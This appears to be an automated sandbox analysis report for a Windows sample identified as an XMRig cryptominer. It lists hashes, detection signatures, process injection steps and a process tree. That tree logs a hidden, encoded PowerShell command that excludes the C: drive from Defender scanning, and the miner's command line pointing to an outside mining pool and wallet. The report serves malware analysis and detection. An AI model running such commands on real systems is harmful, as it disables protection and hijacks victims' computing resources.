Analysis
-
max time kernel
155s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 20:36
Static task
static1
Behavioral task
behavioral1
Sample
b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe
Resource
win7-20230831-en
General
-
Target
b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe
-
Size
628KB
-
MD5
399935464053070d7d563688111ec538
-
SHA1
ae2c6be5624a4f9ac3a25d07492f91f090cbc855
-
SHA256
b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4
-
SHA512
dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597
-
SSDEEP
12288:Nt4WgFT4sdX96+3lxGa75Qmvr0OMTHwtUH3OCzMdOh6:Nt43lvX931xGa7GmvgRTQtieCgdC6
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/2104-49-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-50-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-51-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-54-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-55-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-56-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-57-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-58-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-61-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-62-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/2104-63-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 3400 IsInvalid.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3400 set thread context of 468 3400 IsInvalid.exe 99 PID 468 set thread context of 2104 468 AddInUtil.exe 101 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2716 powershell.exe 2716 powershell.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe 468 AddInUtil.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 676 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4536 b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 3400 IsInvalid.exe Token: SeDebugPrivilege 468 AddInUtil.exe Token: SeLockMemoryPrivilege 2104 AddInProcess.exe Token: SeLockMemoryPrivilege 2104 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2104 AddInProcess.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 3400 wrote to memory of 468 3400 IsInvalid.exe 99 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 PID 468 wrote to memory of 2104 468 AddInUtil.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe"C:\Users\Admin\AppData\Local\Temp\b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exeC:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 44hkbozfzb2j1HuG4ZUrYTXbgE4omN34ffTsZjsG2NUs3iwLtMATrei19gDroXxnn8MBLxYV8LdHNQNeDArSYfS55EgagMA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2104
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD5399935464053070d7d563688111ec538
SHA1ae2c6be5624a4f9ac3a25d07492f91f090cbc855
SHA256b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4
SHA512dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597
-
Filesize
628KB
MD5399935464053070d7d563688111ec538
SHA1ae2c6be5624a4f9ac3a25d07492f91f090cbc855
SHA256b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4
SHA512dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597